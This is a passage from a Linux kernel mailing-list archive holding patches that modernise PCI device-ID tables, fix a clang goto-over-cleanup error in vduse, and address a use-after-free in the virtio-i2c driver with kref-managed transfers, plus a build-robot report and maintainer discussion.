>  static const struct pci_device_id pciidlist[] = {
>         /* Poulsbo */
> -       { 0x8086, 0x8108, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &psb_chip_ops },
> -       { 0x8086, 0x8109, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &psb_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x8108), .driver_data = (long) &psb_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x8109), .driver_data = (long) &psb_chip_ops },
>         /* Oak Trail */
> -       { 0x8086, 0x4100, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &oaktrail_chip_ops },
> -       { 0x8086, 0x4101, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &oaktrail_chip_ops },
> -       { 0x8086, 0x4102, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &oaktrail_chip_ops },
> -       { 0x8086, 0x4103, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &oaktrail_chip_ops },
> -       { 0x8086, 0x4104, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &oaktrail_chip_ops },
> -       { 0x8086, 0x4105, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &oaktrail_chip_ops },
> -       { 0x8086, 0x4106, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &oaktrail_chip_ops },
> -       { 0x8086, 0x4107, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &oaktrail_chip_ops },
> -       { 0x8086, 0x4108, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &oaktrail_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x4100), .driver_data = (long) &oaktrail_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x4101), .driver_data = (long) &oaktrail_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x4102), .driver_data = (long) &oaktrail_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x4103), .driver_data = (long) &oaktrail_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x4104), .driver_data = (long) &oaktrail_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x4105), .driver_data = (long) &oaktrail_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x4106), .driver_data = (long) &oaktrail_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x4107), .driver_data = (long) &oaktrail_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x4108), .driver_data = (long) &oaktrail_chip_ops },
>         /* Cedar Trail */
> -       { 0x8086, 0x0be0, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &cdv_chip_ops },
> -       { 0x8086, 0x0be1, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &cdv_chip_ops },
> -       { 0x8086, 0x0be2, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &cdv_chip_ops },
> -       { 0x8086, 0x0be3, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &cdv_chip_ops },
> -       { 0x8086, 0x0be4, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &cdv_chip_ops },
> -       { 0x8086, 0x0be5, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &cdv_chip_ops },
> -       { 0x8086, 0x0be6, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &cdv_chip_ops },
> -       { 0x8086, 0x0be7, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &cdv_chip_ops },
> -       { 0x8086, 0x0be8, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &cdv_chip_ops },
> -       { 0x8086, 0x0be9, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &cdv_chip_ops },
> -       { 0x8086, 0x0bea, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &cdv_chip_ops },
> -       { 0x8086, 0x0beb, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &cdv_chip_ops },
> -       { 0x8086, 0x0bec, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &cdv_chip_ops },
> -       { 0x8086, 0x0bed, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &cdv_chip_ops },
> -       { 0x8086, 0x0bee, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &cdv_chip_ops },
> -       { 0x8086, 0x0bef, PCI_ANY_ID, PCI_ANY_ID, 0, 0, (long) &cdv_chip_ops },
> -       { 0, }
> +       { PCI_DEVICE(0x8086, 0x0be0), .driver_data = (long) &cdv_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x0be1), .driver_data = (long) &cdv_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x0be2), .driver_data = (long) &cdv_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x0be3), .driver_data = (long) &cdv_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x0be4), .driver_data = (long) &cdv_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x0be5), .driver_data = (long) &cdv_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x0be6), .driver_data = (long) &cdv_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x0be7), .driver_data = (long) &cdv_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x0be8), .driver_data = (long) &cdv_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x0be9), .driver_data = (long) &cdv_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x0bea), .driver_data = (long) &cdv_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x0beb), .driver_data = (long) &cdv_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x0bec), .driver_data = (long) &cdv_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x0bed), .driver_data = (long) &cdv_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x0bee), .driver_data = (long) &cdv_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x0bef), .driver_data = (long) &cdv_chip_ops },
> +       { }
>  };
>  MODULE_DEVICE_TABLE(pci, pciidlist);
>
> diff --git a/drivers/gpu/drm/loongson/lsdc_drv.c b/drivers/gpu/drm/loongson/lsdc_drv.c
> index 1ece1ea42f78..f9f7271ddbff 100644
> --- a/drivers/gpu/drm/loongson/lsdc_drv.c
> +++ b/drivers/gpu/drm/loongson/lsdc_drv.c
> @@ -444,8 +444,8 @@ static const struct dev_pm_ops lsdc_pm_ops = {
>  };
>
>  static const struct pci_device_id lsdc_pciid_list[] = {
> -       {PCI_VDEVICE(LOONGSON, 0x7a06), CHIP_LS7A1000},
> -       {PCI_VDEVICE(LOONGSON, 0x7a36), CHIP_LS7A2000},
> +       { PCI_VDEVICE(LOONGSON, 0x7a06), .driver_data = CHIP_LS7A1000 },
> +       { PCI_VDEVICE(LOONGSON, 0x7a36), .driver_data = CHIP_LS7A2000 },
>         { }
>  };
>
> diff --git a/drivers/gpu/drm/mgag200/mgag200_drv.c b/drivers/gpu/drm/mgag200/mgag200_drv.c
> index a32be27c39e8..8ad4ddb60ee6 100644
> --- a/drivers/gpu/drm/mgag200/mgag200_drv.c
> +++ b/drivers/gpu/drm/mgag200/mgag200_drv.c
> @@ -205,18 +205,18 @@ int mgag200_device_init(struct mga_device *mdev,
>   */
>
>  static const struct pci_device_id mgag200_pciidlist[] = {
> -       { PCI_VENDOR_ID_MATROX, 0x520, PCI_ANY_ID, PCI_ANY_ID, 0, 0, G200_PCI },
> -       { PCI_VENDOR_ID_MATROX, 0x521, PCI_ANY_ID, PCI_ANY_ID, 0, 0, G200_AGP },
> -       { PCI_VENDOR_ID_MATROX, 0x522, PCI_ANY_ID, PCI_ANY_ID, 0, 0, G200_SE_A },
> -       { PCI_VENDOR_ID_MATROX, 0x524, PCI_ANY_ID, PCI_ANY_ID, 0, 0, G200_SE_B },
> -       { PCI_VENDOR_ID_MATROX, 0x530, PCI_ANY_ID, PCI_ANY_ID, 0, 0, G200_EV },
> -       { PCI_VENDOR_ID_MATROX, 0x532, PCI_ANY_ID, PCI_ANY_ID, 0, 0, G200_WB },
> -       { PCI_VENDOR_ID_MATROX, 0x533, PCI_ANY_ID, PCI_ANY_ID, 0, 0, G200_EH },
> -       { PCI_VENDOR_ID_MATROX, 0x534, PCI_ANY_ID, PCI_ANY_ID, 0, 0, G200_ER },
> -       { PCI_VENDOR_ID_MATROX, 0x536, PCI_ANY_ID, PCI_ANY_ID, 0, 0, G200_EW3 },
> -       { PCI_VENDOR_ID_MATROX, 0x538, PCI_ANY_ID, PCI_ANY_ID, 0, 0, G200_EH3 },
> -       { PCI_VENDOR_ID_MATROX, 0x53a, PCI_ANY_ID, PCI_ANY_ID, 0, 0, G200_EH5 },
> -       {0,}
> +       { PCI_VDEVICE(MATROX, 0x0520), .driver_data = G200_PCI },
> +       { PCI_VDEVICE(MATROX, 0x0521), .driver_data = G200_AGP },
> +       { PCI_VDEVICE(MATROX, 0x0522), .driver_data = G200_SE_A },
> +       { PCI_VDEVICE(MATROX, 0x0524), .driver_data = G200_SE_B },
> +       { PCI_VDEVICE(MATROX, 0x0530), .driver_data = G200_EV },
> +       { PCI_VDEVICE(MATROX, 0x0532), .driver_data = G200_WB },
> +       { PCI_VDEVICE(MATROX, 0x0533), .driver_data = G200_EH },
> +       { PCI_VDEVICE(MATROX, 0x0534), .driver_data = G200_ER },
> +       { PCI_VDEVICE(MATROX, 0x0536), .driver_data = G200_EW3 },
> +       { PCI_VDEVICE(MATROX, 0x0538), .driver_data = G200_EH3 },
> +       { PCI_VDEVICE(MATROX, 0x053a), .driver_data = G200_EH5 },
> +       { }
>  };
>
>  MODULE_DEVICE_TABLE(pci, mgag200_pciidlist);
> diff --git a/drivers/gpu/drm/qxl/qxl_drv.c b/drivers/gpu/drm/qxl/qxl_drv.c
> index 2bbb1168a3ff..6c3c309b8e4d 100644
> --- a/drivers/gpu/drm/qxl/qxl_drv.c
> +++ b/drivers/gpu/drm/qxl/qxl_drv.c
> @@ -50,11 +50,16 @@
>  #include "qxl_object.h"
>
>  static const struct pci_device_id pciidlist[] = {
> -       { 0x1b36, 0x100, PCI_ANY_ID, PCI_ANY_ID, PCI_CLASS_DISPLAY_VGA << 8,
> -         0xffff00, 0 },
> -       { 0x1b36, 0x100, PCI_ANY_ID, PCI_ANY_ID, PCI_CLASS_DISPLAY_OTHER << 8,
> -         0xffff00, 0 },
> -       { 0, 0, 0 },
> +       {
> +               PCI_DEVICE(0x1b36, 0x0100),
> +               .class = PCI_CLASS_DISPLAY_VGA << 8,
> +               .class_mask = 0xffff00
> +       }, {
> +               PCI_DEVICE(0x1b36, 0x0100),
> +               .class = PCI_CLASS_DISPLAY_OTHER << 8,
> +               .class_mask = 0xffff00
> +       },
> +       { },
>  };
>  MODULE_DEVICE_TABLE(pci, pciidlist);
>
>
> base-commit: 254f49634ee16a731174d2ae34bc50bd5f45e731
> --
> 2.47.3
>

^ permalink raw reply

* [PATCH] vduse: Fix error around jumping over a __cleanup() variable
From: Nathan Chancellor @ 2026-06-10 19:16 UTC (permalink / raw)
  To: Michael S. Tsirkin, Jason Wang, Xuan Zhuo, Eugenio Pérez
  Cc: virtualization, linux-kernel, llvm, Nathan Chancellor

When building with clang, there is an error in vduse_vq_kick() from
attempting to jump over a variable declared with the cleanup attribute
using goto:

  drivers/vdpa/vdpa_user/vduse_dev.c:566:3: error: cannot jump from this goto statement to its label
    566 |                 goto unlock;
        |                 ^
  drivers/vdpa/vdpa_user/vduse_dev.c:568:2: note: jump bypasses initialization of variable with __attribute__((cleanup))
    568 |         guard(rwsem_read)(&vq->dev->rwsem);
        |         ^

Jumping over a variable declared with the cleanup attribute does not
prevent the cleanup function from running, it would just result in the
variable being passed uninitialized to the cleanup function .clang
errors instead of generating the invalid code, unlike GCC.

The jump is only present to call spin_unlock(), so convert the
spin_lock() and spin_unlock() calls to an equivalent guard() to avoid
the jump while leaving runtime behavior unchanged, clearing up the
warning.

Fixes: 6c141c034c1b ("vduse: Add suspend")
Signed-off-by: Nathan Chancellor <nathan@kernel.org>
---
 drivers/vdpa/vdpa_user/vduse_dev.c | 6 ++----
 1 file changed, 2 insertions(+), 4 deletions(-)

diff --git a/drivers/vdpa/vdpa_user/vduse_dev.c b/drivers/vdpa/vdpa_user/vduse_dev.c
index a257fdcb77b7..0500da043761 100644
--- a/drivers/vdpa/vdpa_user/vduse_dev.c
+++ b/drivers/vdpa/vdpa_user/vduse_dev.c
@@ -561,9 +561,9 @@ static int vduse_vdpa_set_vq_address(struct vdpa_device *vdpa, u16 idx,
 
 static void vduse_vq_kick(struct vduse_virtqueue *vq)
 {
-	spin_lock(&vq->kick_lock);
+	guard(spinlock)(&vq->kick_lock);
 	if (!vq->ready)
-		goto unlock;
+		return;
 
 	guard(rwsem_read)(&vq->dev->rwsem);
 	if (vq->dev->suspended)
@@ -573,8 +573,6 @@ static void vduse_vq_kick(struct vduse_virtqueue *vq)
 		eventfd_signal(vq->kickfd);
 	else
 		vq->kicked = true;
-unlock:
-	spin_unlock(&vq->kick_lock);
 }
 
 static void vduse_vq_kick_work(struct work_struct *work)

---
base-commit: 6c141c034c1b0b74a2ca4dd3d6fbb6d9054f6e46
change-id: 20260610-vduse_vq_kick-fix-guard-usage-d1037c331419

Best regards,
--  
Cheers,
Nathan


^ permalink raw reply related

* Re: [PATCH v3] vduse: Add suspend
From: kernel test robot @ 2026-06-10 19:10 UTC (permalink / raw)
  To: Eugenio Pérez, Michael S . Tsirkin
  Cc: llvm, oe-kbuild-all, virtualization, Jason Wang, Cindy Lu,
	Xuan Zhuo, Stefano Garzarella, linux-kernel, Laurent Vivier,
	Yongji Xie, Eugenio Pérez, Maxime Coquelin
In-Reply-To: <20260610083452.477759-1-eperezma@redhat.com>

Hi Eugenio,

kernel test robot noticed the following build errors:

[auto build test ERROR on next-20260609]
[cannot apply to linus/master v7.1-rc7 v7.1-rc6 v7.1-rc5 v7.1-rc7]
[If your patch is applied to the wrong git tree, kindly drop us a note.
And when submitting patch, we suggest to use '--base' as documented in
https://git-scm.com/docs/git-format-patch#_base_tree_information]

url:    https://github.com/intel-lab-lkp/linux/commits/Eugenio-P-rez/vduse-Add-suspend/20260610-164534
base:   next-20260609
patch link:    https://lore.kernel.org/r/20260610083452.477759-1-eperezma%40redhat.com
patch subject: [PATCH v3] vduse: Add suspend
config: hexagon-allmodconfig (https://download.01.org/0day-ci/archive/20260611/202606110222.CJtRWzQl-lkp@intel.com/config)
compiler: clang version 23.0.0git (https://github.com/llvm/llvm-project 7917772d7d61384696c61102c08c2ea158e610fa)
reproduce (this is a W=1 build): (https://download.01.org/0day-ci/archive/20260611/202606110222.CJtRWzQl-lkp@intel.com/reproduce)

If you fix the issue in a separate patch/commit (i.e. not just a new version of
the same patch/commit), kindly add following tags
| Reported-by: kernel test robot <lkp@intel.com>
| Closes: https://lore.kernel.org/oe-kbuild-all/202606110222.CJtRWzQl-lkp@intel.com/

All errors (new ones prefixed by >>):

>> drivers/vdpa/vdpa_user/vduse_dev.c:566:3: error: cannot jump from this goto statement to its label
     566 |                 goto unlock;
         |                 ^
   drivers/vdpa/vdpa_user/vduse_dev.c:568:2: note: jump bypasses initialization of variable with __attribute__((cleanup))
     568 |         guard(rwsem_read)(&vq->dev->rwsem);
         |         ^
   include/linux/cleanup.h:423:2: note: expanded from macro 'guard'
     423 |         CLASS(_name, __UNIQUE_ID(guard))
         |         ^
   include/linux/cleanup.h:303:3: note: expanded from macro 'CLASS'
     303 |                 class_##_name##_constructor
         |                 ^
   <scratch space>:132:1: note: expanded from here
     132 | class_rwsem_read_constructor
         | ^
   note: (skipping 3 expansions in backtrace; use -fmacro-backtrace-limit=0 to see all)
   include/linux/compiler_types.h:16:23: note: expanded from macro '__PASTE'
      16 | #define __PASTE(a, b) ___PASTE(a, b)
         |                       ^
   include/linux/compiler_types.h:15:24: note: expanded from macro '___PASTE'
      15 | #define ___PASTE(a, b) a##b
         |                        ^
   <scratch space>:138:1: note: expanded from here
     138 | __UNIQUE_ID_unlock_770
         | ^
   drivers/vdpa/vdpa_user/vduse_dev.c:568:2: note: jump bypasses initialization of variable with __attribute__((cleanup))
   include/linux/cleanup.h:423:15: note: expanded from macro 'guard'
     423 |         CLASS(_name, __UNIQUE_ID(guard))
         |                      ^
   include/linux/compiler.h:165:2: note: expanded from macro '__UNIQUE_ID'
     165 |         __PASTE(__UNIQUE_ID_,                                   \
         |         ^
   include/linux/compiler_types.h:16:23: note: expanded from macro '__PASTE'
      16 | #define __PASTE(a, b) ___PASTE(a, b)
         |                       ^
   include/linux/compiler_types.h:15:24: note: expanded from macro '___PASTE'
      15 | #define ___PASTE(a, b) a##b
         |                        ^
   <scratch space>:126:1: note: expanded from here
     126 | __UNIQUE_ID_guard_769
         | ^
   1 error generated.


vim +566 drivers/vdpa/vdpa_user/vduse_dev.c

c8a6153b6c59d9 Xie Yongji        2021-08-31  561  
c8a6153b6c59d9 Xie Yongji        2021-08-31  562  static void vduse_vq_kick(struct vduse_virtqueue *vq)
c8a6153b6c59d9 Xie Yongji        2021-08-31  563  {
c8a6153b6c59d9 Xie Yongji        2021-08-31  564  	spin_lock(&vq->kick_lock);
c8a6153b6c59d9 Xie Yongji        2021-08-31  565  	if (!vq->ready)
c8a6153b6c59d9 Xie Yongji        2021-08-31 @566  		goto unlock;
c8a6153b6c59d9 Xie Yongji        2021-08-31  567  
9c4307e82fa1dc Eugenio Pérez     2026-06-10  568  	guard(rwsem_read)(&vq->dev->rwsem);
9c4307e82fa1dc Eugenio Pérez     2026-06-10  569  	if (vq->dev->suspended)
9c4307e82fa1dc Eugenio Pérez     2026-06-10  570  		return;
9c4307e82fa1dc Eugenio Pérez     2026-06-10  571  
c8a6153b6c59d9 Xie Yongji        2021-08-31  572  	if (vq->kickfd)
3652117f854819 Christian Brauner 2023-11-22  573  		eventfd_signal(vq->kickfd);
c8a6153b6c59d9 Xie Yongji        2021-08-31  574  	else
c8a6153b6c59d9 Xie Yongji        2021-08-31  575  		vq->kicked = true;
c8a6153b6c59d9 Xie Yongji        2021-08-31  576  unlock:
c8a6153b6c59d9 Xie Yongji        2021-08-31  577  	spin_unlock(&vq->kick_lock);
c8a6153b6c59d9 Xie Yongji        2021-08-31  578  }
c8a6153b6c59d9 Xie Yongji        2021-08-31  579  

--
0-DAY CI Kernel Test Service
https://github.com/intel/lkp-tests/wiki

^ permalink raw reply

* Re: [PATCH v5] i2c: virtio: retain xfer with kref to fix UAF on interrupted wait
From: Michael S. Tsirkin @ 2026-06-10 18:29 UTC (permalink / raw)
  To: Gavin Li
  Cc: linux-i2c, viresh.kumar, Chen, Jian Jun, andi.shyti,
	virtualization
In-Reply-To: <CAKvMnUXk0GrYNNYOHvME6FYRdKik-7fV5B-NgvRM+i5yYKTmvw@mail.gmail.com>

On Wed, Jun 10, 2026 at 01:34:10PM -0400, Gavin Li wrote:
> Another option I am considering:
> 
> - Uninterruptible wait with timeout, timeout based on adap->timeout
> - Upon timeout, reset the device with
>   virtio_i2c_del_vqs() + virtio_i2c_setup_vqs() + virtio_device_ready()
> 
> This behavior more closely mirrors what other I2C bus drivers do.
> The device should be completely quiesced when virtio_i2c_del_vqs()
> returns, avoiding the UAF.

I don't know enough about i2c.

Maybe
1. revert
2. some other hack

-- 
MST


^ permalink raw reply

* Re: [PATCH v5] i2c: virtio: retain xfer with kref to fix UAF on interrupted wait
From: Michael S. Tsirkin @ 2026-06-10 18:27 UTC (permalink / raw)
  To: Gavin Li
  Cc: linux-i2c, viresh.kumar, Chen, Jian Jun, andi.shyti,
	virtualization
In-Reply-To: <CAKvMnUW-3b=cqHcozydnc6K1vD06FGk1ZO_q7S6SqhA5d8eR2g@mail.gmail.com>

On Wed, Jun 10, 2026 at 12:32:42PM -0400, Gavin Li wrote:
> On qemu, queue reset is only supported by virtio-net.

Not hard to fix.

> If a queue reset
> is requested, the vhost backend is never notified, and as a result it's
> still at the device's discretion to write to the potentially freed buffer.
> 
> As for device reset, I really don't want to initiate a device reset just
> because a userspace process was signaled (it seems a little extreme).
> I can implement this if you think it is the best path forward.
> 
> Compared to the original patch of making the wait uninterruptible,
> I feel like this patch has become much larger than I originally wanted.
> The commit a663b3c47ab1 ("i2c: virtio: Avoid hang by using interruptible
> completion wait") that introduced the UAF mentioned that it was originally
> done because a transfer could hang, but IMO this should really be fixed
> in the vhost backend rather than in the driver, mostly since virtio-i2c
> doesn't provide a way to cancel an in-flight request.

Maybe the 1st step is to revert that then. Up to i2c maintainers.


^ permalink raw reply

* Re: [PATCH v5] i2c: virtio: retain xfer with kref to fix UAF on interrupted wait
From: Gavin Li @ 2026-06-10 17:34 UTC (permalink / raw)
  To: Michael S. Tsirkin
  Cc: linux-i2c, viresh.kumar, Chen, Jian Jun, andi.shyti,
	virtualization
In-Reply-To: <CAKvMnUW-3b=cqHcozydnc6K1vD06FGk1ZO_q7S6SqhA5d8eR2g@mail.gmail.com>

Another option I am considering:

- Uninterruptible wait with timeout, timeout based on adap->timeout
- Upon timeout, reset the device with
  virtio_i2c_del_vqs() + virtio_i2c_setup_vqs() + virtio_device_ready()

This behavior more closely mirrors what other I2C bus drivers do.
The device should be completely quiesced when virtio_i2c_del_vqs()
returns, avoiding the UAF.

On Wed, Jun 10, 2026 at 12:32 PM Gavin Li <gavin.li@samsara.com> wrote:
>
> On qemu, queue reset is only supported by virtio-net. If a queue reset
> is requested, the vhost backend is never notified, and as a result it's
> still at the device's discretion to write to the potentially freed buffer.
>
> As for device reset, I really don't want to initiate a device reset just
> because a userspace process was signaled (it seems a little extreme).
> I can implement this if you think it is the best path forward.
>
> Compared to the original patch of making the wait uninterruptible,
> I feel like this patch has become much larger than I originally wanted.
> The commit a663b3c47ab1 ("i2c: virtio: Avoid hang by using interruptible
> completion wait") that introduced the UAF mentioned that it was originally
> done because a transfer could hang, but IMO this should really be fixed
> in the vhost backend rather than in the driver, mostly since virtio-i2c
> doesn't provide a way to cancel an in-flight request.
>
> On Wed, Jun 10, 2026 at 12:07 PM Michael S. Tsirkin <mst@redhat.com> wrote:
> >
> > On Wed, Jun 10, 2026 at 11:58:34AM -0400, Gavin Li wrote:
> > > commit a663b3c47ab1 ("i2c: virtio: Avoid hang by using interruptible
> > > completion wait") switched virtio_i2c_complete_reqs() to
> > > wait_for_completion_interruptible() so a stuck device cannot hang a
> > > task forever. That left a use-after-free: if the wait returns early on
> > > a signal, virtio_i2c_xfer() frees reqs and DMA bounce buffers while the
> > > device may still hold virtqueue tokens pointing at &reqs[i] and DMA
> > > into read buffers. When those requests complete later,
> > > virtio_i2c_msg_done() calls complete() on freed memory.
> > >
> > > Waiting uninterruptibly for every completion before freeing avoids the
> > > UAF but can hang the caller indefinitely if the virtio side never
> > > completes the request. Performing a queue reset / device reset is
> > > possible in this scenario, but adds complexity.
> > >
> > > This commit manages the freeing of the xfer allocations via kref, and
> > > ensures that each in-flight request holds a reference. This fixes the
> > > use-after-free by ensuring that the virtio device has a valid location
> > > to write to until the request completes. This will cause a memory leak
> > > in cases where the device hangs, but that is much preferable to memory
> > > corruption.
> > >
> > > Additionally, force usage of a bounce buffer even if the i2c_msg buf is
> > > DMA-safe, since the buffer passed to the virtqueue must remain valid
> > > even if the transfer is interrupted. Remove usage of
> > > i2c_get_dma_safe_msg_buf() since it may pass through msg->buf directly.
> > > All bounce buffers are part of the single xfer allocation, so there is
> > > no additional allocation overhead.
> > >
> > > Signed-off-by: Gavin Li <gavin.li@samsara.com>
> >
> > But maybe, if queue reset is supported, we could use that?
> >
> > Is that problematic?
> >
> >
> > And maybe fallback on device reset on interrupt even?
> >
> > > ---
> > >
> > > Changes in v5:
> > > - DMA-align all bounce buffers
> > >
> > > Changes in v4:
> > > - Pack bounce buffers into a single allocation after reqs[]
> > > - Remove per-request buf pointer and xfer->num
> > > - Remove req.msg, track message direction with req->read
> > > - Simplify xfer release to a single kfree()
> > > - Restore using j to track successful transfers in _complete_xfer()
> > > ---
> > >  drivers/i2c/busses/i2c-virtio.c | 135 +++++++++++++++++++++++++-------
> > >  1 file changed, 108 insertions(+), 27 deletions(-)
> > >
> > > diff --git a/drivers/i2c/busses/i2c-virtio.c b/drivers/i2c/busses/i2c-virtio.c
> > > index 5da6fef92bec3..a5602865102d9 100644
> > > --- a/drivers/i2c/busses/i2c-virtio.c
> > > +++ b/drivers/i2c/busses/i2c-virtio.c
> > > @@ -10,10 +10,13 @@
> > >
> > >  #include <linux/acpi.h>
> > >  #include <linux/completion.h>
> > > +#include <linux/dma-mapping.h>
> > >  #include <linux/err.h>
> > >  #include <linux/i2c.h>
> > >  #include <linux/kernel.h>
> > > +#include <linux/kref.h>
> > >  #include <linux/module.h>
> > > +#include <linux/overflow.h>
> > >  #include <linux/virtio.h>
> > >  #include <linux/virtio_ids.h>
> > >  #include <linux/virtio_config.h>
> > > @@ -31,39 +34,80 @@ struct virtio_i2c {
> > >       struct virtqueue *vq;
> > >  };
> > >
> > > +struct virtio_i2c_xfer;
> > > +
> > >  /**
> > >   * struct virtio_i2c_req - the virtio I2C request structure
> > > + * @xfer: owning transfer
> > >   * @completion: completion of virtio I2C message
> > > + * @read: true if this is a read message (I2C_M_RD is set)
> > >   * @out_hdr: the OUT header of the virtio I2C message
> > > - * @buf: the buffer into which data is read, or from which it's written
> > >   * @in_hdr: the IN header of the virtio I2C message
> > >   */
> > >  struct virtio_i2c_req {
> > > +     struct virtio_i2c_xfer *xfer;
> > >       struct completion completion;
> > > +     bool read;
> > >       struct virtio_i2c_out_hdr out_hdr       ____cacheline_aligned;
> > > -     uint8_t *buf                            ____cacheline_aligned;
> > >       struct virtio_i2c_in_hdr in_hdr         ____cacheline_aligned;
> > >  };
> > >
> > > +/**
> > > + * struct virtio_i2c_xfer - a queued I2C transfer
> > > + * @ref: one ref for the caller, plus one per in-flight virtqueue request
> > > + * @bounce_buf_base: start of bounce buffer region
> > > + * @reqs: the virtio I2C requests
> > > + *
> > > + * Allocation layout:
> > > + * - struct virtio_i2c_xfer xfer
> > > + * - struct virtio_i2c_req reqs[num]
> > > + * - padding to dma_get_cache_alignment()
> > > + * - u8 bounce_buf[virtio_i2c_bounce_size(msgs[0].len)]
> > > + *   ...
> > > + * - u8 bounce_buf[virtio_i2c_bounce_size(msgs[num-1].len)]
> > > + */
> > > +struct virtio_i2c_xfer {
> > > +     struct kref ref;
> > > +     u8 *bounce_buf_base;
> > > +     struct virtio_i2c_req reqs[];
> > > +};
> > > +
> > > +static size_t virtio_i2c_bounce_size(unsigned int len)
> > > +{
> > > +     return ALIGN(len, dma_get_cache_alignment());
> > > +}
> > > +
> > > +static void virtio_i2c_xfer_release(struct kref *ref)
> > > +{
> > > +     struct virtio_i2c_xfer *xfer = container_of(ref, struct virtio_i2c_xfer, ref);
> > > +     kfree(xfer);
> > > +}
> > > +
> > >  static void virtio_i2c_msg_done(struct virtqueue *vq)
> > >  {
> > >       struct virtio_i2c_req *req;
> > >       unsigned int len;
> > >
> > > -     while ((req = virtqueue_get_buf(vq, &len)))
> > > +     while ((req = virtqueue_get_buf(vq, &len))) {
> > >               complete(&req->completion);
> > > +             kref_put(&req->xfer->ref, virtio_i2c_xfer_release);
> > > +     }
> > >  }
> > >
> > > -static int virtio_i2c_prepare_reqs(struct virtqueue *vq,
> > > -                                struct virtio_i2c_req *reqs,
> > > +static int virtio_i2c_prepare_xfer(struct virtqueue *vq,
> > > +                                struct virtio_i2c_xfer *xfer,
> > >                                  struct i2c_msg *msgs, int num)
> > >  {
> > >       struct scatterlist *sgs[3], out_hdr, msg_buf, in_hdr;
> > > +     struct virtio_i2c_req *reqs = xfer->reqs;
> > > +     u8 *bounce_buf = xfer->bounce_buf_base;
> > >       int i;
> > >
> > >       for (i = 0; i < num; i++) {
> > >               int outcnt = 0, incnt = 0;
> > >
> > > +             reqs[i].xfer = xfer;
> > > +             reqs[i].read = !!(msgs[i].flags & I2C_M_RD);
> > >               init_completion(&reqs[i].completion);
> > >
> > >               /*
> > > @@ -82,23 +126,31 @@ static int virtio_i2c_prepare_reqs(struct virtqueue *vq,
> > >               sgs[outcnt++] = &out_hdr;
> > >
> > >               if (msgs[i].len) {
> > > -                     reqs[i].buf = i2c_get_dma_safe_msg_buf(&msgs[i], 1);
> > > -                     if (!reqs[i].buf)
> > > -                             break;
> > > +                     /*
> > > +                      * Even if msg->flags has I2C_M_DMA_SAFE set, a bounce
> > > +                      * buffer is required because the transfer may be
> > > +                      * interrupted, after which msg->buf is no longer valid.
> > > +                      */
> > > +                     if (!(msgs[i].flags & I2C_M_RD))
> > > +                             memcpy(bounce_buf, msgs[i].buf, msgs[i].len);
> > >
> > > -                     sg_init_one(&msg_buf, reqs[i].buf, msgs[i].len);
> > > +                     sg_init_one(&msg_buf, bounce_buf, msgs[i].len);
> > >
> > >                       if (msgs[i].flags & I2C_M_RD)
> > >                               sgs[outcnt + incnt++] = &msg_buf;
> > >                       else
> > >                               sgs[outcnt++] = &msg_buf;
> > >               }
> > > +             bounce_buf += virtio_i2c_bounce_size(msgs[i].len);
> > >
> > >               sg_init_one(&in_hdr, &reqs[i].in_hdr, sizeof(reqs[i].in_hdr));
> > >               sgs[outcnt + incnt++] = &in_hdr;
> > >
> > > +             /* This reference is released in virtio_i2c_msg_done(). */
> > > +             kref_get(&xfer->ref);
> > > +
> > >               if (virtqueue_add_sgs(vq, sgs, outcnt, incnt, &reqs[i], GFP_KERNEL)) {
> > > -                     i2c_put_dma_safe_msg_buf(reqs[i].buf, &msgs[i], false);
> > > +                     kref_put(&xfer->ref, virtio_i2c_xfer_release);
> > >                       break;
> > >               }
> > >       }
> > > @@ -106,26 +158,38 @@ static int virtio_i2c_prepare_reqs(struct virtqueue *vq,
> > >       return i;
> > >  }
> > >
> > > -static int virtio_i2c_complete_reqs(struct virtqueue *vq,
> > > -                                 struct virtio_i2c_req *reqs,
